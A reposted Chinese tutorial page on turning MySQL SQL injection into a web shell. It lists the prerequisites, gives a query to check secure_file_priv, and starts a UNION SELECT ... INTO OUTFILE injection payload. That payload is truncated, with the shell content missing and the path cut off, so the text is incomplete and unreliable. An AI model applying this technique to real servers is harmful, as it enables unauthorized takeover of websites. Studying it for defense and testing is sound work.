首页 > 数据库技术 > 详细

mysql注入getshell

时间:2021-05-22 23:46:05      阅读:19      评论:0      收藏:0      [点我收藏+]

0x00 利用条件

  • root权限
  • secure_file_priv=为空或者在网站根目录下(网站根目录为d:\www,secure_file_priv=d:\也可以)
  • 知道绝对路径
  • gpc关闭,这个应该是php的,会转义单引号,选择路径的时候一定需要单引号

0x01 查看secure_file_priv设置

show global variables like ‘%secure_file_priv%‘;
查询结果
技术分享图片

  • 5.7.26为null,5.5.29为空
    这里为NULL

0x02 联合注入写shell

select * from users where id=-1 union select 1,2,‘‘ into outfile ‘D

mysql注入getshell

原文:https://www.cnblogs.com/Dark1nt/p/14799961.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!